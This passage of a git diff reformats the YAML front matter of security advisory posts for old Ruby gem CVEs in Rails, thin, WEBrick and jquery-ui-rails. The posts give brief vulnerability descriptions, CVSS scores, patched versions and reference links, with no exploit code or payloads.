+    - http://rails.lighthouseapp.com/projects/8994/tickets/288
+    - http://rails.lighthouseapp.com/projects/8994/tickets/964
+    - http://www.openwall.com/lists/oss-security/2008/09/13/2
+    - http://www.openwall.com/lists/oss-security/2008/09/16/1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2008-5189.md b/advisories/_posts/2017-10-24-CVE-2008-5189.md
index c532c9fd..c3aac3f8 100644
--- a/advisories/_posts/2017-10-24-CVE-2008-5189.md
+++ b/advisories/_posts/2017-10-24-CVE-2008-5189.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2008-5189 (rails): Moderate severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2008-5189
-  ghsa: jmgf-p46x-982h
-  url: http://weblog.rubyonrails.org/2008/10/19/rails-2-0-5-redirect_to-and-offset-limit-sanitizing
-  title: Moderate severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    CRLF injection vulnerability in Ruby on Rails before 2.0.5 allows remote
-    attackers to inject arbitrary HTTP headers and conduct HTTP response
-    splitting attacks via a crafted URL to the redirect_to function.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 2.0.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2008-5189
-    - http://weblog.rubyonrails.org/2008/10/19/rails-2-0-5-redirect_to-and-offset-limit-sanitizing
-    - http://github.com/rails/rails/commit/7282ed863ca7e6f928bae9162c9a63a98775a19d
-    - http://weblog.rubyonrails.org/2008/10/19/response-splitting-risk
-    - http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00002.html
-    - https://github.com/advisories/GHSA-jmgf-p46x-982h
----
+---
+layout: advisory
+title: 'CVE-2008-5189 (rails): Moderate severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2008-5189
+  ghsa: jmgf-p46x-982h
+  url: http://weblog.rubyonrails.org/2008/10/19/rails-2-0-5-redirect_to-and-offset-limit-sanitizing
+  title: Moderate severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    CRLF injection vulnerability in Ruby on Rails before 2.0.5 allows remote
+    attackers to inject arbitrary HTTP headers and conduct HTTP response
+    splitting attacks via a crafted URL to the redirect_to function.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 2.0.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-5189
+    - http://weblog.rubyonrails.org/2008/10/19/rails-2-0-5-redirect_to-and-offset-limit-sanitizing
+    - http://github.com/rails/rails/commit/7282ed863ca7e6f928bae9162c9a63a98775a19d
+    - http://weblog.rubyonrails.org/2008/10/19/response-splitting-risk
+    - http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00002.html
+    - https://github.com/advisories/GHSA-jmgf-p46x-982h
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2008-7248.md b/advisories/_posts/2017-10-24-CVE-2008-7248.md
index 94ee6c1c..b494888f 100644
--- a/advisories/_posts/2017-10-24-CVE-2008-7248.md
+++ b/advisories/_posts/2017-10-24-CVE-2008-7248.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2008-7248 (actionpack): Improper Input Validation in rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2008-7248
-  ghsa: 8fqx-7pv4-3jwm
-  url: https://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
-  title: Improper Input Validation in rails
-  date: 2017-10-24
-  description: |
-    Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify
-    tokens for requests with certain content types, which allows remote
-    attackers to bypass cross-site request forgery (CSRF) protection
-    for requests to applications that rely on this protection, as
-    demonstrated using text/plain.
-  cvss_v2: 6.8
-  unaffected_versions:
-  - "< 2.1.0"
-  patched_versions:
-  - "~> 2.1.3"
-  - ">= 2.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2008-7248
-    - https://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
-    - https://groups.google.com/group/rubyonrails-security/browse_thread/thread/d741ee286e36e301?hl=en
-    - https://www.rorsecurity.info/journal/2008/11/19/circumvent-rails-csrf-protection.html
-    - https://github.com/advisories/GHSA-8fqx-7pv4-3jwm
-    - https://access.redhat.com/security/cve/CVE-2008-7248
-    - https://bugzilla.redhat.com/show_bug.cgi?id=544329
-    - https://pseudo-flaw.net/content/web-browsers/form-data-encoding-roundup/
-    - https://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html
-    - https://www.openwall.com/lists/oss-security/2009/11/28/1
-    - https://www.openwall.com/lists/oss-security/2009/12/02/2
-    - http://github.com/rails/rails/commit/099a98e9b7108dae3e0f78b207e0a7dc5913bd1a
-    - http://github.com/rails/rails/commit/f1ad8b48aae3ee26613b3e77bc0056e120096846
-    - https://rubygems.org/gems/rails/versions/2.1.2
-    - https://rubygems.org/gems/rails/versions/2.1.2
----
+---
+layout: advisory
+title: 'CVE-2008-7248 (actionpack): Improper Input Validation in rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2008-7248
+  ghsa: 8fqx-7pv4-3jwm
+  url: https://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
+  title: Improper Input Validation in rails
+  date: 2017-10-24
+  description: |
+    Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify
+    tokens for requests with certain content types, which allows remote
+    attackers to bypass cross-site request forgery (CSRF) protection
+    for requests to applications that rely on this protection, as
+    demonstrated using text/plain.
+  cvss_v2: 6.8
+  unaffected_versions:
+  - "< 2.1.0"
+  patched_versions:
+  - "~> 2.1.3"
+  - ">= 2.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-7248
+    - https://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
+    - https://groups.google.com/group/rubyonrails-security/browse_thread/thread/d741ee286e36e301?hl=en
+    - https://www.rorsecurity.info/journal/2008/11/19/circumvent-rails-csrf-protection.html
+    - https://github.com/advisories/GHSA-8fqx-7pv4-3jwm
+    - https://access.redhat.com/security/cve/CVE-2008-7248
+    - https://bugzilla.redhat.com/show_bug.cgi?id=544329
+    - https://pseudo-flaw.net/content/web-browsers/form-data-encoding-roundup/
+    - https://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html
+    - https://www.openwall.com/lists/oss-security/2009/11/28/1
+    - https://www.openwall.com/lists/oss-security/2009/12/02/2
+    - http://github.com/rails/rails/commit/099a98e9b7108dae3e0f78b207e0a7dc5913bd1a
+    - http://github.com/rails/rails/commit/f1ad8b48aae3ee26613b3e77bc0056e120096846
+    - https://rubygems.org/gems/rails/versions/2.1.2
+    - https://rubygems.org/gems/rails/versions/2.1.2
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2009-3009.md b/advisories/_posts/2017-10-24-CVE-2009-3009.md
index 727d7c50..1df6743f 100644
--- a/advisories/_posts/2017-10-24-CVE-2009-3009.md
+++ b/advisories/_posts/2017-10-24-CVE-2009-3009.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2009-3009 (activesupport): Moderate severity XSS vulnerability that affects
-  rails'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2009-3009
-  osvdb: 57666
-  ghsa: 8qrh-h9m2-5fvf
-  url: http://weblog.rubyonrails.org/2009/9/4/xss-vulnerability-in-ruby-on-rails
-  title: Moderate severity XSS vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in Ruby on Rails 2.x before
-    2.2.3, and 2.3.x before 2.3.4, allows remote attackers to inject arbitrary
-    web script or HTML by placing malformed Unicode strings into a form helper.
-
-    9/4/2009 url mentions patches for 2.0, 2.1, 2.2, and 2.3 series.
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - "~> 2.2.3"
-  - ">= 2.3.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-3009
-    - http://weblog.rubyonrails.org/2009/9/4/xss-vulnerability-in-ruby-on-rails
-    - https://groups.google.com/g/rubyonrails-security/c/SKs_SiwWGQ8/m/tNHhlHfNV38J
-    - http://www.osvdb.org/57666
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/53036
-    - https://github.com/advisories/GHSA-8qrh-h9m2-5fvf
-    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=545063
-    - https://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html
-    - http://support.apple.com/kb/HT4077
-    - https://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html
-    - http://www.debian.org/security/2009/dsa-1887
----
+---
+layout: advisory
+title: 'CVE-2009-3009 (activesupport): Moderate severity XSS vulnerability that affects
+  rails'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2009-3009
+  osvdb: 57666
+  ghsa: 8qrh-h9m2-5fvf
+  url: http://weblog.rubyonrails.org/2009/9/4/xss-vulnerability-in-ruby-on-rails
+  title: Moderate severity XSS vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in Ruby on Rails 2.x before
+    2.2.3, and 2.3.x before 2.3.4, allows remote attackers to inject arbitrary
+    web script or HTML by placing malformed Unicode strings into a form helper.
+
+    9/4/2009 url mentions patches for 2.0, 2.1, 2.2, and 2.3 series.
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - "~> 2.2.3"
+  - ">= 2.3.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-3009
+    - http://weblog.rubyonrails.org/2009/9/4/xss-vulnerability-in-ruby-on-rails
+    - https://groups.google.com/g/rubyonrails-security/c/SKs_SiwWGQ8/m/tNHhlHfNV38J
+    - http://www.osvdb.org/57666
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/53036
+    - https://github.com/advisories/GHSA-8qrh-h9m2-5fvf
+    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=545063
+    - https://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html
+    - http://support.apple.com/kb/HT4077
+    - https://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html
+    - http://www.debian.org/security/2009/dsa-1887
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2009-3086.md b/advisories/_posts/2017-10-24-CVE-2009-3086.md
index 0efbb894..c00eeb28 100644
--- a/advisories/_posts/2017-10-24-CVE-2009-3086.md
+++ b/advisories/_posts/2017-10-24-CVE-2009-3086.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2009-3086 (activesupport): actionpack and activesupport vulnerable to
-  information leaks'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2009-3086
-  ghsa: fg9w-g6m4-557j
-  url: http://weblog.rubyonrails.org/2009/9/4/timing-weakness-in-ruby-on-rails
-  title: actionpack and activesupport vulnerable to information leaks
-  date: 2017-10-24
-  description: |
-    A certain algorithm in Ruby on Rails 2.1.0 through 2.2.2, and 2.3.x
-    before 2.3.4, leaks information about the complexity of message-digest
-    signature verification in the cookie store, which might allow remote
-    attackers to forge a digest via multiple attempts.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "< 2.1.0"
-  patched_versions:
-  - "~> 2.2.3"
-  - ">= 2.3.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-3086
-    - http://weblog.rubyonrails.org/2009/9/4/timing-weakness-in-ruby-on-rails
-    - https://github.com/advisories/GHSA-fg9w-g6m4-557j
-    - http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html
-    - http://www.debian.org/security/2011/dsa-2260
-    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2009-3086.yml
-    - https://github.com/rails/rails/commit/1f07a89c5946910fc28ea5ccd1da6af8a0f972a0
-    - https://github.com/rails/rails/commit/674f780d59a5a7ec0301755d43a7b277a3ad2978
-    - https://github.com/rails/rails/commit/d460c9a25560f43e7c3789abadf7b455053eb686
-    - https://web.archive.org/web/20090906010200/http://www.vupen.com/english/advisories/2009/2544
-    - https://web.archive.org/web/20090907001716/http://secunia.com/advisories/36600
-    - https://web.archive.org/web/20200229150042/http://www.securityfocus.com/bid/37427
-    - https://github.com/advisories/GHSA-fg9w-g6m4-557j
----
+---
+layout: advisory
+title: 'CVE-2009-3086 (activesupport): actionpack and activesupport vulnerable to
+  information leaks'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2009-3086
+  ghsa: fg9w-g6m4-557j
+  url: http://weblog.rubyonrails.org/2009/9/4/timing-weakness-in-ruby-on-rails
+  title: actionpack and activesupport vulnerable to information leaks
+  date: 2017-10-24
+  description: |
+    A certain algorithm in Ruby on Rails 2.1.0 through 2.2.2, and 2.3.x
+    before 2.3.4, leaks information about the complexity of message-digest
+    signature verification in the cookie store, which might allow remote
+    attackers to forge a digest via multiple attempts.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "< 2.1.0"
+  patched_versions:
+  - "~> 2.2.3"
+  - ">= 2.3.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-3086
+    - http://weblog.rubyonrails.org/2009/9/4/timing-weakness-in-ruby-on-rails
+    - https://github.com/advisories/GHSA-fg9w-g6m4-557j
+    - http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html
+    - http://www.debian.org/security/2011/dsa-2260
+    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2009-3086.yml
+    - https://github.com/rails/rails/commit/1f07a89c5946910fc28ea5ccd1da6af8a0f972a0
+    - https://github.com/rails/rails/commit/674f780d59a5a7ec0301755d43a7b277a3ad2978
+    - https://github.com/rails/rails/commit/d460c9a25560f43e7c3789abadf7b455053eb686
+    - https://web.archive.org/web/20090906010200/http://www.vupen.com/english/advisories/2009/2544
+    - https://web.archive.org/web/20090907001716/http://secunia.com/advisories/36600
+    - https://web.archive.org/web/20200229150042/http://www.securityfocus.com/bid/37427
+    - https://github.com/advisories/GHSA-fg9w-g6m4-557j
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2009-3287.md b/advisories/_posts/2017-10-24-CVE-2009-3287.md
index 96917897..0d2c70d4 100644
--- a/advisories/_posts/2017-10-24-CVE-2009-3287.md
+++ b/advisories/_posts/2017-10-24-CVE-2009-3287.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2009-3287 (thin): High severity vulnerability that affects thin'
-comments: false
-categories:
-- thin
-advisory:
-  gem: thin
-  cve: 2009-3287
-  ghsa: j24p-r6wx-r79w
-  url: http://github.com/macournoyer/thin/blob/master/CHANGELOG
-  title: High severity vulnerability that affects thin
-  date: 2017-10-24
-  description: |
-    lib/thin/connection.rb in Thin web server before 1.2.4 relies on the
-    X-Forwarded-For header to determine the IP address of the client,
-    which allows remote attackers to spoof the IP address and hide
-    activities via a modified X-Forwarded-For header.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 1.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-3287
-    - http://github.com/macournoyer/thin/blob/master/CHANGELOG
-    - http://github.com/macournoyer/thin/commit/7bd027914c5ffd36bb408ef47dc749de3b6e063a
-    - https://github.com/advisories/GHSA-j24p-r6wx-r79w
-    - http://www.openwall.com/lists/oss-security/2009/09/12/1
----
+---
+layout: advisory
+title: 'CVE-2009-3287 (thin): High severity vulnerability that affects thin'
+comments: false
+categories:
+- thin
+advisory:
+  gem: thin
+  cve: 2009-3287
+  ghsa: j24p-r6wx-r79w
+  url: http://github.com/macournoyer/thin/blob/master/CHANGELOG
+  title: High severity vulnerability that affects thin
+  date: 2017-10-24
+  description: |
+    lib/thin/connection.rb in Thin web server before 1.2.4 relies on the
+    X-Forwarded-For header to determine the IP address of the client,
+    which allows remote attackers to spoof the IP address and hide
+    activities via a modified X-Forwarded-For header.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 1.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-3287
+    - http://github.com/macournoyer/thin/blob/master/CHANGELOG
+    - http://github.com/macournoyer/thin/commit/7bd027914c5ffd36bb408ef47dc749de3b6e063a
+    - https://github.com/advisories/GHSA-j24p-r6wx-r79w
+    - http://www.openwall.com/lists/oss-security/2009/09/12/1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2009-4214.md b/advisories/_posts/2017-10-24-CVE-2009-4214.md
index 95552320..f96bed04 100644
--- a/advisories/_posts/2017-10-24-CVE-2009-4214.md
+++ b/advisories/_posts/2017-10-24-CVE-2009-4214.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2009-4214 (rails): Moderate severity XSS vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2009-4214
-  ghsa: 9p3v-wf2w-v29c
-  url: http://weblog.rubyonrails.org/2009/11/30/ruby-on-rails-2-3-5-released
-  title: Moderate severity XSS vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in the strip_tags function
-    in Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote
-    attackers to inject arbitrary web script or HTML via vectors involving
-    non-printing ASCII characters,related to HTML::Tokenizer and
-    actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.2.2"
-  - ">= 2.3.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-4214
-    - http://weblog.rubyonrails.org/2009/11/30/ruby-on-rails-2-3-5-released
-    - https://groups.google.com/g/rubyonrails-security/c/TU9x8q70wKs
-    - http://github.com/rails/rails/commit/bfe032858077bb2946abe25e95e485ba6da86bd5
-    - https://github.com/advisories/GHSA-9p3v-wf2w-v29c
-    - http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html
-    - http://support.apple.com/kb/HT4077
-    - http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.htm
-    - http://www.debian.org/security/2011/dsa-2260
-    - http://www.debian.org/security/2011/dsa-2301
-    - http://www.openwall.com/lists/oss-security/2009/11/27/2
-    - http://www.openwall.com/lists/oss-security/2009/12/08/3
----
+---
+layout: advisory
+title: 'CVE-2009-4214 (rails): Moderate severity XSS vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2009-4214
+  ghsa: 9p3v-wf2w-v29c
+  url: http://weblog.rubyonrails.org/2009/11/30/ruby-on-rails-2-3-5-released
+  title: Moderate severity XSS vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in the strip_tags function
+    in Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote
+    attackers to inject arbitrary web script or HTML via vectors involving
+    non-printing ASCII characters,related to HTML::Tokenizer and
+    actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.2.2"
+  - ">= 2.3.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-4214
+    - http://weblog.rubyonrails.org/2009/11/30/ruby-on-rails-2-3-5-released
+    - https://groups.google.com/g/rubyonrails-security/c/TU9x8q70wKs
+    - http://github.com/rails/rails/commit/bfe032858077bb2946abe25e95e485ba6da86bd5
+    - https://github.com/advisories/GHSA-9p3v-wf2w-v29c
+    - http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html
+    - http://support.apple.com/kb/HT4077
+    - http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.htm
+    - http://www.debian.org/security/2011/dsa-2260
+    - http://www.debian.org/security/2011/dsa-2301
+    - http://www.openwall.com/lists/oss-security/2009/11/27/2
+    - http://www.openwall.com/lists/oss-security/2009/12/08/3
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2009-4492.md b/advisories/_posts/2017-10-24-CVE-2009-4492.md
index 4e0638de..4bbc1313 100644
--- a/advisories/_posts/2017-10-24-CVE-2009-4492.md
+++ b/advisories/_posts/2017-10-24-CVE-2009-4492.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2009-4492 (webrick): WEBrick Improper Input Validation vulnerability'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2009-4492
-  ghsa: 6mq2-37j5-w6r6
-  url: https://github.com/advisories/GHSA-6mq2-37j5-w6r6
-  title: WEBrick Improper Input Validation vulnerability
-  date: 2017-10-24
-  description: |
-    WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel
-    248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file
-    without sanitizing non-printable characters, which might allow remote attackers
-    to modify a window's title, or possibly execute arbitrary commands or overwrite
-    files, via an HTTP request containing an escape sequence for a terminal emulator.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 1.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-4492
-    - https://github.com/advisories/GHSA-6mq2-37j5-w6r6
-    - http://www.redhat.com/support/errata/RHSA-2011-0908.html
-    - http://www.redhat.com/support/errata/RHSA-2011-0909.html
-    - http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection
-    - http://www.ush.it/team/ush/hack_httpd_escape/adv.txt
-    - https://web.archive.org/web/20100113155532/http://www.vupen.com/english/advisories/2010/0089
-    - https://web.archive.org/web/20100815010948/http://secunia.com/advisories/37949
-    - https://web.archive.org/web/20170402100552/http://securitytracker.com/id?1023429
-    - https://web.archive.org/web/20170908140655/http://www.securityfocus.com/archive/1/508830/100/0/threaded
-    - https://web.archive.org/web/20200228145937/http://www.securityfocus.com/bid/37710
----
+---
+layout: advisory
+title: 'CVE-2009-4492 (webrick): WEBrick Improper Input Validation vulnerability'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2009-4492
+  ghsa: 6mq2-37j5-w6r6
+  url: https://github.com/advisories/GHSA-6mq2-37j5-w6r6
+  title: WEBrick Improper Input Validation vulnerability
+  date: 2017-10-24
+  description: |
+    WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel
+    248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file
+    without sanitizing non-printable characters, which might allow remote attackers
+    to modify a window's title, or possibly execute arbitrary commands or overwrite
+    files, via an HTTP request containing an escape sequence for a terminal emulator.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 1.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-4492
+    - https://github.com/advisories/GHSA-6mq2-37j5-w6r6
+    - http://www.redhat.com/support/errata/RHSA-2011-0908.html
+    - http://www.redhat.com/support/errata/RHSA-2011-0909.html
+    - http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection
+    - http://www.ush.it/team/ush/hack_httpd_escape/adv.txt
+    - https://web.archive.org/web/20100113155532/http://www.vupen.com/english/advisories/2010/0089
+    - https://web.archive.org/web/20100815010948/http://secunia.com/advisories/37949
+    - https://web.archive.org/web/20170402100552/http://securitytracker.com/id?1023429
+    - https://web.archive.org/web/20170908140655/http://www.securityfocus.com/archive/1/508830/100/0/threaded
+    - https://web.archive.org/web/20200228145937/http://www.securityfocus.com/bid/37710
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2010-3933.md b/advisories/_posts/2017-10-24-CVE-2010-3933.md
index 8efe13cb..c6035ec6 100644
--- a/advisories/_posts/2017-10-24-CVE-2010-3933.md
+++ b/advisories/_posts/2017-10-24-CVE-2010-3933.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2010-3933 (activerecord): Security Vulnerability in Nested Attributes
-  code in Ruby On Rails 2.3.9 and 3.0.0'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2010-3933
-  ghsa: gjxw-5w2q-7grf
-  url: http://weblog.rubyonrails.org/2010/10/15/security-vulnerability-in-nested-attributes-code-in-ruby-on-rails-2-3-9-and-3-0-0
-  title: Security Vulnerability in Nested Attributes code in Ruby On Rails 2.3.9 and
-    3.0.0
-  date: 2017-10-24
-  description: |
-    Ruby on Rails 2.3.9 and 3.0.0 does not properly handle nested
-    attributes, which allows remote attackers to modify arbitrary
-    records by changing the names of parameters for form inputs.
-
-    Patches are available for 2.3 and 3.0 series.
-  cvss_v2: 6.4
-  unaffected_versions:
-  - "< 2.3.9"
-  patched_versions:
-  - "~> 2.3.9"
-  - ">= 3.0.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2010-3933
-    - http://weblog.rubyonrails.org/2010/10/15/security-vulnerability-in-nested-attributes-code-in-ruby-on-rails-2-3-9-and-3-0-0
-    - https://github.com/advisories/GHSA-gjxw-5w2q-7grf
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/41930
-    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1024624
----
+---
+layout: advisory
+title: 'CVE-2010-3933 (activerecord): Security Vulnerability in Nested Attributes
+  code in Ruby On Rails 2.3.9 and 3.0.0'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2010-3933
+  ghsa: gjxw-5w2q-7grf
+  url: http://weblog.rubyonrails.org/2010/10/15/security-vulnerability-in-nested-attributes-code-in-ruby-on-rails-2-3-9-and-3-0-0
+  title: Security Vulnerability in Nested Attributes code in Ruby On Rails 2.3.9 and
+    3.0.0
+  date: 2017-10-24
+  description: |
+    Ruby on Rails 2.3.9 and 3.0.0 does not properly handle nested
+    attributes, which allows remote attackers to modify arbitrary
+    records by changing the names of parameters for form inputs.
+
+    Patches are available for 2.3 and 3.0 series.
+  cvss_v2: 6.4
+  unaffected_versions:
+  - "< 2.3.9"
+  patched_versions:
+  - "~> 2.3.9"
+  - ">= 3.0.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-3933
+    - http://weblog.rubyonrails.org/2010/10/15/security-vulnerability-in-nested-attributes-code-in-ruby-on-rails-2-3-9-and-3-0-0
+    - https://github.com/advisories/GHSA-gjxw-5w2q-7grf
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/41930
+    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1024624
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2010-5312.md b/advisories/_posts/2017-10-24-CVE-2010-5312.md
index b31a0cb9..f1466800 100644
--- a/advisories/_posts/2017-10-24-CVE-2010-5312.md
+++ b/advisories/_posts/2017-10-24-CVE-2010-5312.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2010-5312 (jquery-ui-rails): Cross-site Scripting in jquery-ui'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2010-5312
-  ghsa: wcm2-9c89-wmfm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2010-5312
-  title: Cross-site Scripting in jquery-ui
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in
-    the Dialog widget in jQuery UI before 1.10.0 allows remote attackers
-    to inject arbitrary web script or HTML via the title option.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2010-5312
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/61a8e3f50796118e9f49fbd224b67d4065b40c50
-    - http://bugs.jqueryui.com/ticket/6016
-    - https://github.com/jquery/jquery-ui/commit/7e9060c109b928769a664dbcc2c17bd21231b6f3
-    - https://security.netapp.com/advisory/ntap-20190416-0007
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98696
-    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f
-    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442
-    - http://rhn.redhat.com/errata/RHSA-2015-0442.html
-    - http://rhn.redhat.com/errata/RHSA-2015-1462.html
-    - http://seclists.org/oss-sec/2014/q4/613
-    - http://seclists.org/oss-sec/2014/q4/616
-    - http://www.debian.org/security/2015/dsa-3249
-    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc
-    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
-    - https://www.drupal.org/sa-core-2022-002
-    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f
-    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442
-    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
